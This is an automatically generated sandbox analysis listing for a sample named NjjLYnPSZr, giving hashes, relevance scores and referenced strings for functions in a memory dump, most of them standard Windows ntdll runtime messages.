                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a071861ee409042fa3cdd6f6d4d3474ec3ed4b5cadd63558b9947f18e5ff7360
                                                                                                          • Instruction ID: 314d3ee337876e3766c9eac76f04b06ff2cbeff3a1cdd3eea2201bc4259d3a3d
                                                                                                          • Opcode Fuzzy Hash: a071861ee409042fa3cdd6f6d4d3474ec3ed4b5cadd63558b9947f18e5ff7360
                                                                                                          • Instruction Fuzzy Hash: 5E90026160180413E14075588808607000597D0302F55C022A2464555ECA298D516239
                                                                                                          Function 01063010 Relevance: .0, Instructions: 4COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fd33ac3044792a9890e82f291a303dca01edb847f5f6eaaf5ee2111a938f3406
                                                                                                          • Instruction ID: 0d230f28c09aa299b0629e421c92af7fbdb4a4a05aab70aef5938a7e607aec17
                                                                                                          • Opcode Fuzzy Hash: fd33ac3044792a9890e82f291a303dca01edb847f5f6eaaf5ee2111a938f3406
                                                                                                          • Instruction Fuzzy Hash: C090022160184452E14072588808B0F410597E1202F95C02AA4556554CC91589555735
                                                                                                          Function 01063090 Relevance: .0, Instructions: 4COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9c5d074c98410b5b5b13f61568548ffb3c075cc57812279f2e5b4c0f0c5de68d
                                                                                                          • Instruction ID: 191113fd4ccb7ebeab7d945aed8436c2c7f70cb65d6181405afa89fb81d388fe
                                                                                                          • Opcode Fuzzy Hash: 9c5d074c98410b5b5b13f61568548ffb3c075cc57812279f2e5b4c0f0c5de68d
                                                                                                          • Instruction Fuzzy Hash: 8590022164140812E1407158C4187070006D7D0601F55C022A0424554DC6168A6567B5
                                                                                                          Function 010639B0 Relevance: .0, Instructions: 4COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                                                                          • Instruction ID: 47db6235e42f3649182fe71f096440e10a50cb57d36a7e30bcc7559e954a6442
                                                                                                          • Opcode Fuzzy Hash: 515af0d1e341be64ea8d3ee256d9ec61601772433a08784c01fefcb78e3a8a07
                                                                                                          • Instruction Fuzzy Hash: B790022164545112E150715C84086164005B7E0201F55C032A0C14594DC55589556335
                                                                                                          Function 01062C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                          • Instruction ID: 88d5b39d2a2274618ce46fc13efde132462e7ce9333afcc162b23dd6d63b7b9b
                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          Function 01062890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: f72695d306db84acef1a9ff49cdd4d6e633c74352e15a6769e1e6ff53aa8ecd8
                                                                                                          • Instruction ID: ed07a0f822ee1976867ba5b7c54f31f447c9a4e6b7cca1072831b6a529b7be02
                                                                                                          • Opcode Fuzzy Hash: f72695d306db84acef1a9ff49cdd4d6e633c74352e15a6769e1e6ff53aa8ecd8
                                                                                                          • Instruction Fuzzy Hash: A451C3A2B00116BEDB21DB9C8C9097EFBF8BB49240B148269F5E5D7645D334DE509BE0
                                                                                                          Function 010D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: 3281313f3461557c06dcaec25a14c42d9e9bbea946a91aca1457a0675be2d9d6
                                                                                                          • Instruction ID: 48d1b48265297b3e92c55aafa5229d76fea0d0478c0f0aa4b7f319adadb4ff1a
                                                                                                          • Opcode Fuzzy Hash: 3281313f3461557c06dcaec25a14c42d9e9bbea946a91aca1457a0675be2d9d6
                                                                                                          • Instruction Fuzzy Hash: 9D511671A00746AECB71DF9CC99097FBBF8EF44200B448499F9D6D7645EA74EA40C760
                                                                                                          Function 01057630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • Execute=1, xrefs: 01094713
                                                                                                          • ExecuteOptions, xrefs: 010946A0
                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01094725
                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01094655
                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01094742
                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010946FC
                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01094787
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                          • API String ID: 0-484625025
                                                                                                          • Opcode ID: 1fc28e852e6758838fec64a4f39c28cda9504887855e49b450e67a1e7165e875
                                                                                                          • Instruction ID: e71105037a0be61703b01e1805b4025433e421cc7a696d503c666a463bdfd643
                                                                                                          • Opcode Fuzzy Hash: 1fc28e852e6758838fec64a4f39c28cda9504887855e49b450e67a1e7165e875
                                                                                                          • Instruction Fuzzy Hash: C8510C3160021EAAEF51AAA8EC95FEE77ECFF18300F4400D9DA85A7181D7719E41DF61
                                                                                                          Function 0106B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-$0$0
                                                                                                          • API String ID: 1302938615-699404926
                                                                                                          • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                          • Instruction ID: 721eff7e79d749c3f495dec3fca96552ccf3a78f04f57fc4a215e313ce91551d
                                                                                                          • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                          • Instruction Fuzzy Hash: C381C0B0F0524A8EEF258E6CC8517FEBBE9BF45320F184199E9D1E7291C7388941CB51
                                                                                                          Function 010D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$[$]:%u
                                                                                                          • API String ID: 48624451-2819853543
                                                                                                          • Opcode ID: 8f868d2bc68997fd58019c0286bb8d971ff60507b476b0c5c85b069ab9740d7c
                                                                                                          • Instruction ID: 5981ecc56c05ed84e82438488df9770dac549c91e1a899e4a0e93952c556eaac
                                                                                                          • Opcode Fuzzy Hash: 8f868d2bc68997fd58019c0286bb8d971ff60507b476b0c5c85b069ab9740d7c
                                                                                                          • Instruction Fuzzy Hash: 3E21657AE00219ABDB11DF79CC50AFEBBF8EF64650F044156E995E7204E730DA418BA1
                                                                                                          Function 0104F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010902E7
                                                                                                          • RTL: Re-Waiting, xrefs: 0109031E
                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010902BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                          • API String ID: 0-2474120054
                                                                                                          • Opcode ID: eb942337e1265301caf45290d5447296c47013be6fe2e7b611fe358de621fdb0
                                                                                                          • Instruction ID: bd40fcdef8b8e8603ca8bb7e988f8e04e583d84c127cbe5fd2304cdc3449cc58
                                                                                                          • Opcode Fuzzy Hash: eb942337e1265301caf45290d5447296c47013be6fe2e7b611fe358de621fdb0
                                                                                                          • Instruction Fuzzy Hash: F5E1A0B06047429FEB65CF2CC894B5ABBE4BB48314F144AADF5E58B2D1D774D844CB42
                                                                                                          Function 0105B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0109728C
                                                                                                          Strings
                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01097294
                                                                                                          • RTL: Re-Waiting, xrefs: 010972C1
                                                                                                          • RTL: Resource at %p, xrefs: 010972A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 885266447-605551621
                                                                                                          • Opcode ID: b1fd29d3aab43a3dce223c6850260e0121c9030067d37eafc469c61d37627de9
                                                                                                          • Instruction ID: e561b53bfa97663e5bfc7299a16b2a24c08b48846ea40736c96fe4f6c02a8ae0
                                                                                                          • Opcode Fuzzy Hash: b1fd29d3aab43a3dce223c6850260e0121c9030067d37eafc469c61d37627de9
                                                                                                          • Instruction Fuzzy Hash: 2641F432710206ABDB21DE69CC41BAABBE6FF54710F104659FDD59B280DB21F8119BD1
                                                                                                          Function 010D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$]:%u
                                                                                                          • API String ID: 48624451-3050659472
                                                                                                          • Opcode ID: 9a2fa3c0dab90068b64a9e17db91e816f3d27c8ff3d4f6338b34cea5c1ff4a8a
                                                                                                          • Instruction ID: 3d43a2f6ea6018f1afb385d088e53a94cb5cac2d82127c623aa425ffa42fbaf5
                                                                                                          • Opcode Fuzzy Hash: 9a2fa3c0dab90068b64a9e17db91e816f3d27c8ff3d4f6338b34cea5c1ff4a8a
                                                                                                          • Instruction Fuzzy Hash: CF315472A003199FDB60DF2DCC40BEEB7F8EB54610F554596ED89E3244EF309A548BA0
                                                                                                          Function 01029126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1971204229.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_ff0000_NjjLYnPSZr.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $$@
                                                                                                          • API String ID: 0-1194432280
                                                                                                          • Opcode ID: 2b769edde979e6e52f74786bb514d93603e171d72a0464c37d425480c7db6811
                                                                                                          • Instruction ID: 7ee7dffd314e27f1a24b1d81502e5448390e77526cbdeceb467e7901815968c5
                                                                                                          • Opcode Fuzzy Hash: 2b769edde979e6e52f74786bb514d93603e171d72a0464c37d425480c7db6811
                                                                                                          • Instruction Fuzzy Hash: F3812971D002799BDB35DB54CC44BEEBAB8AF49754F0041EAEA59B7240D7709E84CFA0